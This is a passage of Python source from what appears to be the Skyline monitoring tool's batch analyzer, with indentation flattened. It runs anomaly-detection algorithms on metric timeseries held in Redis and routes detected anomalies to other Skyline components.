# 2020-04-14 12:57:25 :: 3222 :: anomaly_breakdown - histogram_bins: 0, first_hour_average: 0, stddev_from_average: 0, grubbs: 0, ks_test: 0, mean_subtraction_cumulation: 0, median_absolute_deviation: 0, stddev_from_moving_average: 0, least_squares: 0
number_of_timestamps_to_analyze = len(timestamps_to_analyse)
if number_of_timestamps_to_analyze == 0:
logger.info('no timestamps were found to analyze for %s from %s, nothing to do' % (
metric_name, str(last_analyzed_timestamp)))
# @added 20200424 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Feature #3504: Handle airgaps in batch metrics
# If there are no data points to analyze remove from the set
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
# Clean up and return
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if batch_mode:
continue
else:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
return
else:
last_redis_data_timestamp = timestamps_to_analyse[-1]
logger.info('%s timestamps were found to analyze for %s from %s to %s' % (
str(number_of_timestamps_to_analyze), metric_name,
str(last_analyzed_timestamp), str(last_redis_data_timestamp)))
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere_untrainable_metrics Redis set
run_negatives_present = False
if settings.IONOSPHERE_ENABLED:
run_negatives_present = True
try:
known_negative_metric_matched_by = None
known_negative_metric, known_negative_metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, KNOWN_NEGATIVE_METRICS)
if known_negative_metric:
run_negatives_present = False
except:
run_negatives_present = True
# @added 20170602 - Feature #2034: analyse_derivatives
# In order to convert monotonic, incrementing metrics to a deriative
# metric
known_derivative_metric = False
unknown_deriv_status = True
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Switch the order in which they are checked and do not check if
# not manage_derivative_metrics as will only be set to True anyway
# if metric_name in non_derivative_metrics:
# unknown_deriv_status = False
# if unknown_deriv_status:
# if metric_name in derivative_metrics:
# known_derivative_metric = True
# unknown_deriv_status = False
if metric_name in derivative_metrics:
known_derivative_metric = True
unknown_deriv_status = False
if unknown_deriv_status:
if metric_name in non_derivative_metrics:
unknown_deriv_status = False
# First check if it has its own Redis z.derivative_metric key
# that has not expired
derivative_metric_key = 'z.derivative_metric.%s' % str(base_name)
# @added 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# When a monotonic metric changes in the last run before a
# manage_derivative_metrics run, when manage_derivative_metrics runs
# it classifies it and adds it to non_derivative_metrics the only
# way to stop this is check the key for each metric
last_derivative_metric_key = None
try:
last_derivative_metric_key = self.redis_conn_decoded.get(derivative_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
if last_derivative_metric_key:
known_derivative_metric = True
if unknown_deriv_status:
# @added 20170617 - Bug #2050: analyse_derivatives - change in monotonicity
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Always check moved to above
# last_derivative_metric_key = False
# try:
# last_derivative_metric_key = self.redis_conn.get(derivative_metric_key)
# except Exception as e:
# logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Apply skip_derivative
skip_derivative = in_list(base_name, non_derivative_monotonic_metrics)
is_strictly_increasing_monotonically = False
if not skip_derivative:
is_strictly_increasing_monotonically = strictly_increasing_monotonicity(timeseries)
if is_strictly_increasing_monotonically:
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
else:
is_strictly_increasing_monotonically = False
# Determine if it is a strictly increasing monotonically metric
# or has been in last FULL_DURATION via its z.derivative_metric
# key
if last_derivative_metric_key:
# Until the z.derivative_metric key expires, it is classed
# as such
is_strictly_increasing_monotonically = True
if skip_derivative:
is_strictly_increasing_monotonically = False
if is_strictly_increasing_monotonically:
known_derivative_metric = True
try:
self.redis_conn.sadd('derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis derivative_metrics set')
try:
self.redis_conn.sadd('new_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_derivative_metrics set')
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
# @added 20210325 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Remove from non_derivative_metrics as per analyzer
try:
self.redis_conn.srem('non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis non_derivative_metrics set')
else:
try:
self.redis_conn.sadd('non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis non_derivative_metrics set')
try:
self.redis_conn.sadd('new_non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_non_derivative_metrics set')
not_anomalous_count = 0
# @added 20200815 - Feature #3678: SNAB - anomalyScore
record_anomalyScore = False
if SNAB_anomalyScore:
SNAB_metrics = []
try:
SNAB_all_metrics = SNAB_anomalyScore['all']
if SNAB_all_metrics:
for SNAB_metric in SNAB_all_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_all_metrics = []
try:
SNAB_app_metrics = SNAB_anomalyScore[skyline_app]
if SNAB_app_metrics:
for SNAB_metric in SNAB_app_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_app_metrics = []
if SNAB_metrics:
for SNAB_metric_namespace in list(set(SNAB_metrics)):
if SNAB_metric_namespace in base_name:
record_anomalyScore = True
break
test_anomaly = False
test_anomaly_at = None
try:
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly = self.redis_conn.get(test_anomaly_key)
test_anomaly_at = int(test_anomaly)
logger.info('test_anomaly - testing anomly on %s at %s' % (metric_name, str(test_anomaly_at)))
except:
test_anomaly = None
except:
test_anomaly = False
# Distill timeseries strings into lists
for i, batch_timestamp in enumerate(timestamps_to_analyse):
self.check_if_parent_is_alive()
batch_timeseries = []
for timestamp, value in timeseries:
if int(timestamp) <= batch_timestamp:
batch_timeseries.append([timestamp, value])
if known_derivative_metric:
try:
derivative_timeseries = nonNegativeDerivative(batch_timeseries)
batch_timeseries = derivative_timeseries
except:
logger.error('error :: nonNegativeDerivative failed')
try:
# Allow for testing. If you want to test a metric and then stop
# the metric sending data to carbon-relay (use a vista metric).
# Determine a timestamp that will fall into the stopped period
# Add the timestamp to a Redis key called
# analyzer_batch.test.<metric_name>
# Start the metric sending data again (re-enable in vista)
# vista/flux will fill the missing data, when analyzer pushes
# the metric to analyzer_batch to process, if analyzer_batch
# is set to test_anomaly True and finds the key, if the
# timestamp matches the timestamp in the key, analyzer_batch
# will multiply the timestamp data point by 15, this should
# trigger an anomaly. Ensure you use a metric which will
# trigger, a load related metric is usually adequate.
# test_anomaly = False
test_anomaly_at = None
test_anomaly_batch_timeseries = []
if test_anomaly:
test_anomaly_at = None
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly_at = self.redis_conn.get(test_anomaly_key)
except:
test_anomaly_at = None
if test_anomaly_at:
if int(test_anomaly_at) == int(batch_timeseries[-1][0]):
for timestamp, value in batch_timeseries:
if int(timestamp) == int(test_anomaly_at):
anomaly_value = value * 100
logger.info('test_anomaly - replacing value %s with anomaly_value of %s at %s in %s timeseries' % (
str(value), str(anomaly_value),
str(test_anomaly_at), metric_name))
value = anomaly_value
test_anomaly_batch_timeseries.append([timestamp, value])
if test_anomaly_batch_timeseries:
batch_timeseries = test_anomaly_batch_timeseries
logger.info('test_anomaly - replaced %s timeseries with anomaly value in it' % (
metric_name))
try:
self.redis_conn.delete(test_anomaly_key)
logger.info('test_anomaly - deleted test_anomaly Redis key - %s' % str(test_anomaly_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete test_anomaly Redis key - %s' % str(test_anomaly_key))
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algoritms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# metric_airgaps = []
# anomalous, ensemble, datapoint = run_selected_algorithm(batch_timeseries, metric_name, metric_airgaps)
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added run_negatives_present and added negatives_found
# anomalous, ensemble, datapoint = run_selected_batch_algorithm(batch_timeseries, metric_name)
# @modified 20200607 - Feature #3566: custom_algorithms
# Added algorithms_run
# @modified 20200815 - Feature #3678: SNAB - anomalyScore
# Added the number_of_algorithms to calculate anomalyScore from
anomalous, ensemble, datapoint, negatives_found, algorithms_run, number_of_algorithms = run_selected_batch_algorithm(batch_timeseries, metric_name, run_negatives_present)
if test_anomaly_batch_timeseries:
logger.info('test_anomaly - analyzed %s data with anomaly value in it and anomalous = %s' % (
metric_name, str(anomalous)))
# @added 20200815 - Feature #3678: SNAB - anomalyScore
if record_anomalyScore:
anomalyScore_file = '%s/%s/%s/skyline.SNAB.%s.anomalyScore.csv' % (
SNAB_DATA_DIR, skyline_app, base_name, base_name)
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
run_debug = False
if ensemble.count(True) and algorithms_run:
run_debug = True
if (int(batch_timestamp) % 20000) == 0:
run_debug = True
if run_debug:
logger.debug('debug :: ensemble to calculate anomalyScore - %s' % str(ensemble))
logger.debug('debug :: algorithms_run to calculate anomalyScore - %s' % str(algorithms_run))
for index, value in enumerate(ensemble):
if value:
algorithm = algorithms_run[index]
triggered_algorithms.append(algorithm)
if run_debug:
logger.debug('debug :: triggered_algorithms to calculate anomalyScore - %s' % str(triggered_algorithms))
anomalyScore = 0.0
try:
if len(triggered_algorithms) > 0 and number_of_algorithms > 0:
if len(triggered_algorithms) > settings.CONSENSUS:
anomalyScore = 1.0
else:
anomalyScore = len(triggered_algorithms) / settings.CONSENSUS
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate anomalyScore')
if not os.path.isfile(anomalyScore_file):
data = 'timestamp,value,anomalyScore,triggered_algorithms\n'
write_data_to_file(skyline_app, anomalyScore_file, 'w', data)
data = '%s,%s,%s,%s\n' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms))
write_data_to_file(skyline_app, anomalyScore_file, 'a', data)
if run_debug:
logger.debug('%s,%s,%s,%s' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms)))
# Update the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
try:
int_metric_timestamp = int(batch_timestamp)
# @modified 20200503 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Set the last_timestamp expiry time to 1 month rather than
# settings.FULL_DURATION
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
redis_key_set = True
except:
logger.error('error :: failed to set Redis key %s' % last_metric_timestamp_key)
if anomalous:
if redis_key_set:
logger.info('anomalous :: anomaly detected on %s at %s with %s, set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('anomalous :: anomaly detected on %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere.untrainable_metrics Redis set
if run_negatives_present and negatives_found:
redis_set = 'ionosphere.untrainable_metrics'
try:
last_negative_timestamp = int(negatives_found[-1][0])
last_negative_value = negatives_found[-1][1]
remove_after_timestamp = int(last_negative_timestamp + settings.FULL_DURATION)
data = str([metric_name, batch_timestamp, datapoint, last_negative_timestamp, last_negative_value, settings.FULL_DURATION, remove_after_timestamp])
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add data to Redis set %s' % (
str(redis_set)))
# Added a Redis key for Mirage, Panorama and Ionosphere to
# query to identify if an anomaly has been added by
# analyzer_batch and set a longish TTL as if multiple
# anomalies for multiple metrics in a batch are sent to
# Ionosphere it could take Ionosphere a while to analyze
# them all. This key circumvents the requirement of each
# app to determine if a metric is a batch metric, as this
# is only created for batch metric anomalies.
analyzer_batch_metric_anomaly_key = '%s.anomaly.%s.%s' % (
skyline_app, str(int_metric_timestamp), base_name)
try:
int_metric_timestamp = int(batch_timestamp)
self.redis_conn.setex(
analyzer_batch_metric_anomaly_key,
3600, int_metric_timestamp)
logger.info('set Redis key %s with %s for other apps to identify this as an analyzer_batch anomaly' % (
analyzer_batch_metric_anomaly_key,
str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
if redis_key_set:
not_anomalous_count += 1
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('not anomalous :: %s at %s with %s (along with %s other not anomalous data points), set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
str(not_anomalous_count),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('not anomalous :: %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20190408 - Feature #2882: Mirage - periodic_check
# Add for Mirage periodic - is really anomalous add to
# real_anomalous_metrics and if in mirage_periodic_check_metric_list
# add as anomalous
if anomalous:
metric_timestamp = batch_timeseries[-1][0]
metric = [datapoint, base_name, metric_timestamp]
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
for index, value in enumerate(ensemble):
if value:
# @modified 20200607 - Feature #3566: custom_algorithms
# algorithm = settings.ALGORITHMS[index]
algorithm = algorithms_run[index]
anomaly_breakdown[algorithm] += 1
triggered_algorithms.append(algorithm)
# @added 20170206 - Bug #1904: Handle non filesystem friendly metric names in check files
sane_metricname = filesafe_metricname(str(base_name))
# If Panorama is enabled determine details
determine_anomaly_details = False
if settings.PANORAMA_ENABLED:
determine_anomaly_details = True
# If Ionosphere is enabled determine details
try:
ionosphere_enabled = settings.IONOSPHERE_ENABLED
if settings.IONOSPHERE_ENABLED:
determine_anomaly_details = True
except:
ionosphere_enabled = False
if determine_anomaly_details:
metric_timestamp = str(int(batch_timeseries[-1][0]))
from_timestamp = str(int(batch_timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
send_back_to_analyzer = None
# @added 20161119 - Branch #922: ionosphere
# Task #1718: review.tsfresh
# Set defaults which can be used later to determine how
# Analyzer should handle/route anomalies
analyzer_metric = True
mirage_metric = False
ionosphere_metric = False
send_to_ionosphere = False
if metric_name in ionosphere_unique_metrics:
ionosphere_metric = True
send_to_ionosphere = True
if metric_name in mirage_unique_metrics:
analyzer_metric = False
ionosphere_metric = False
mirage_metric = True
send_to_ionosphere = False
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
smtp_alert_enabled_metric = True
if base_name in non_smtp_alerter_metrics:
smtp_alert_enabled_metric = False
if ionosphere_enabled:
if analyzer_metric:
# We do not want send all anomalous metrics to
# Ionosphere if they are not being alerted on as
# they will be pointless they will have no alert if
# it is within the EXPIRATION_TIME and there will be
# no reference graphs from an alert for the user to
# action.
cache_key = 'last_alert.smtp.%s' % (base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
send_to_ionosphere = True
else:
send_to_ionosphere = False
if ionosphere_metric:
logger.info('not sending to Ionosphere - alert key exists - %s' % (base_name))
else:
if mirage_metric:
logger.info('not sending to Ionosphere - Mirage metric - %s' % (base_name))
send_to_ionosphere = False
# analyzer_batch sends Analyzer and Mirage
# metrics back to analyzer
send_back_to_analyzer = True
# @added 20170306 - Feature #1960: ionosphere_layers
# Ionosphere layers require the timeseries at
# FULL_DURATION so if this is a Mirage and
# Ionosphere metric, Analyzer needs to provide
# the timeseries file for later (within 60
# seconds) analysis, however we want the data
# that triggered the anomaly, as before this was
# only created by Mirage if an alert was
# triggered, but Ionosphere layers now require
# this file before an alert is triggered
timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(metric_timestamp),
str(timeseries_dir))
if not os.path.exists(training_dir):
mkdir_p(training_dir)
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
ionosphere_json_file = '%s/%s.mirage.redis.%sh.json' % (
training_dir, base_name,
str(int(full_duration_in_hours)))
if not os.path.isfile(ionosphere_json_file):
timeseries_json = str(batch_timeseries).replace('[', '(').replace(']', ')')
try:
write_data_to_file(skyline_app, ionosphere_json_file, 'w', timeseries_json)
logger.info('%s added Ionosphere Mirage %sh Redis data timeseries json file :: %s' % (
skyline_app, str(int(full_duration_in_hours)), ionosphere_json_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s Ionosphere Mirage Redis data timeseries json file - %s' % (skyline_app, ionosphere_json_file))
# @modified 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
# if send_to_ionosphere:
if send_to_ionosphere and smtp_alert_enabled_metric:
if metric_name in ionosphere_unique_metrics:
logger.info('sending an ionosphere metric to Ionosphere - %s' % (base_name))
else:
logger.info('sending an analyzer metric to Ionosphere for training - %s' % (base_name))
try:
# @modified 20161228 Feature #1828: ionosphere - mirage Redis data features
# Added full_duration
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = 0
send_anomalous_metric_to(
skyline_app, 'ionosphere', timeseries_dir,
metric_timestamp, base_name, str(datapoint),
from_timestamp, triggered_algorithms,
batch_timeseries, str(settings.FULL_DURATION),
str(ionosphere_parent_id))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis key block below
# self.sent_to_ionosphere.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send_anomalous_metric_to to ionosphere')
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'analyzer.batch.sent_to_ionosphere'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20170403 - Feature #1994: Ionosphere training_dir keys
# Feature #2000: Ionosphere - validated
# Feature #1996: Ionosphere - matches page
# The addition of this key data could be done in
# skyline_function.py, however that would introduce
# Redis requirements in the send_anomalous_metric_to
# function, which is not desirable I think. So this is
# a non-KISS pattern that is replicated in mirage.py as
# well.
# Each training_dir and data set is now Redis keyed to increase efficiency
# in terms of disk I/O for ionosphere.py and making keyed data
# available for each training_dir data set so that transient matched data
# can be surfaced for the webapp along with directory paths, etc
ionosphere_training_data_key = 'ionosphere.training_data.%s.%s' % (str(metric_timestamp), base_name)
ionosphere_training_data_key_data = [
['metric_timestamp', int(metric_timestamp)],
['base_name', str(base_name)],
['timeseries_dir', str(timeseries_dir)],
['added_by', str(skyline_app)]
]
try:
self.redis_conn.setex(
ionosphere_training_data_key,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR,
# @modified 20190413 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Use str
str(ionosphere_training_data_key_data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s' % ionosphere_training_data_key)
try:
del ionosphere_training_data_key_data
except:
pass
if ionosphere_metric:
analyzer_metric = False
# Only send Analyzer metrics
if analyzer_metric and settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed is single quoted intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200603 - Feature #3566: custom_algorithms
# metric_timestamp, str(settings.ALGORITHMS),
metric_timestamp, str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
sane_metricname)
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis set block below
# self.sent_to_panorama.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
try:
del panorama_anomaly_data
except:
pass
redis_set = 'analyzer_batch.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
else:
# @modified 20160207 - Branch #922: Ionosphere
# Handle if all other apps are not enabled
other_app = 'none'
if mirage_metric:
other_app = 'Mirage'
if ionosphere_metric:
other_app = 'Ionosphere'
logger.info('not adding panorama anomaly file for %s - %s' % (other_app, metric))
# Send back to Analyzer to alert
if analyzer_metric:
send_back_to_analyzer = True
if send_back_to_analyzer:
cache_key = '%s.alert.%s.%s' % (skyline_app, metric_timestamp, base_name)
# @modified 20201008 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added algorithms_run
cache_key_value = [float(datapoint), base_name, int(metric_timestamp), triggered_algorithms, algorithms_run]
try:
self.redis_conn.setex(
cache_key, 300,
str(cache_key_value))
logger.info(
'add Redis alert key - %s - %s' %
(cache_key, str(cache_key_value)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s] - %s' %
(cache_key, str(datapoint), base_name,
str(int(metric_timestamp)),
str(triggered_algorithms),
str(algorithms_run), e))
# It could have been deleted by the Roomba
except TypeError:
# @added 20200430 - Feature #3480: batch_processing
# Added logging here as the DeletedByRoomba exception is
# generally not related to that but related to some other fail
# in the processing of the run algorithms phase
logger.error(traceback.format_exc())
logger.error('error :: added as DeletedByRoomba but possibly not see traceback above')
exceptions['DeletedByRoomba'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Handle analyzer_batch work being added over and over every
# minute by also updating the last_timestamp key if stale,
# boring, etc
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
logger.info('set Redis key %s to %s, even though it has been deleted by Roomba' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is has been deleted by Roomba' % last_metric_timestamp_key)
except TooShort:
exceptions['TooShort'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is too short' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is too short' % last_metric_timestamp_key)
except Stale:
exceptions['Stale'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is stale' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is stale' % last_metric_timestamp_key)
except Boring:
exceptions['Boring'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is boring' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is boring' % last_metric_timestamp_key)
except:
logger.error(traceback.format_exc())
logger.error('error - Other error reported')
exceptions['Other'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
logger.error('error :: set Redis key %s to %s, even though it an other error has been thrown' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, when other exception was thrown' % last_metric_timestamp_key)
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if not batch_mode:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.batch_anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.batch_exceptions_q.put((key, value))
spin_end = time() - spin_start
logger.info('spin_batch_process took %.2f seconds' % spin_end)
return
def run(self):
"""
- Called when the process intializes.
- Determine if Redis is up and discover the number of `unique metrics`.
- Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
and assign each process a set of metrics to analyse for anomalies.
- Wait for the processes to finish.
- Determine whether if any anomalous metrics require:
- Alerting on (and set `EXPIRATION_TIME` key in Redis for alert).
- Feed to another module e.g. mirage.
- Alert to syslog.
- Populate the webapp json with the anomalous_metrics details.
- Log the details about the run to the skyline analyzer log.
- Send skyline.analyzer metrics to `GRAPHITE_HOST`
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190417 - Feature #2950: Report defaulted settings to log
# Added all the globally declared settings to enable reporting in the
# log the state of each setting.
try:
